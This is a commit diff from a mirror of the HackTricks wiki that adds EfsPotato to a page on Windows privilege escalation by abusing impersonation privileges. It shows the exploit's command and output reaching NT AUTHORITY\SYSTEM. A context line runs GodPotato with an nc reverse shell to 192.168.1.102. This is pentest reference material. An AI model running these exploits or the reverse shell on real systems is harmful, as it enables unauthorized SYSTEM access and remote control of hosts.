mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-24 21:53:54 +00:00
roguepotato-and-printspoofer.md: Add EfsPotato
This commit is contained in:
parent
82743ad320
commit
b44fe27cf0
1 changed files with 21 additions and 1 deletions
|
@ -29,7 +29,7 @@ You can check their website and try their engine for **free** at:
|
||||||
***
|
***
|
||||||
|
|
||||||
{% hint style="warning" %}
|
{% hint style="warning" %}
|
||||||
**JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato) can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. This [blog post](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) goes in-depth on the `PrintSpoofer` tool, which can be used to abuse impersonation privileges on Windows 10 and Server 2019 hosts where JuicyPotato no longer works.
|
**JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato)**,**[**EfsPotato**](https://github.com/zcgonvh/EfsPotato) can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. This [blog post](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) goes in-depth on the `PrintSpoofer` tool, which can be used to abuse impersonation privileges on Windows 10 and Server 2019 hosts where JuicyPotato no longer works.
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
## Quick Demo
|
## Quick Demo
|
||||||
|
@ -82,6 +82,25 @@ C:\temp>type C:\temp\w.log
|
||||||
nt authority\system
|
nt authority\system
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### EfsPotato
|
||||||
|
|
||||||
|
```
|
||||||
|
EfsPotato.exe "whoami"
|
||||||
|
Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability).
|
||||||
|
Part of GMH's fuck Tools, Code By zcgonvh.
|
||||||
|
CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net]
|
||||||
|
|
||||||
|
[+] Current user: NT Service\MSSQLSERVER
|
||||||
|
[+] Pipe: \pipe\lsarpc
|
||||||
|
[!] binding ok (handle=aeee30)
|
||||||
|
[+] Get Token: 888
|
||||||
|
[!] process with pid: 3696 created.
|
||||||
|
==============================
|
||||||
|
[x] EfsRpcEncryptFileSrv failed: 1818
|
||||||
|
|
||||||
|
nt authority\system
|
||||||
|
```
|
||||||
|
|
||||||
### GodPotato
|
### GodPotato
|
||||||
|
|
||||||
```
|
```
|
||||||
|
@ -96,6 +115,7 @@ GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
|
||||||
* [https://github.com/antonioCoco/RoguePotato](https://github.com/antonioCoco/RoguePotato)
|
* [https://github.com/antonioCoco/RoguePotato](https://github.com/antonioCoco/RoguePotato)
|
||||||
* [https://github.com/bugch3ck/SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato)
|
* [https://github.com/bugch3ck/SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato)
|
||||||
* [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato)
|
* [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato)
|
||||||
|
* [https://github.com/zcgonvh/EfsPotato](https://github.com/zcgonvh/EfsPotato)
|
||||||
|
|
||||||
### [WhiteIntel](https://whiteintel.io)
|
### [WhiteIntel](https://whiteintel.io)
|
||||||
|
|
||||||
|
|
Loading…
Reference in a new issue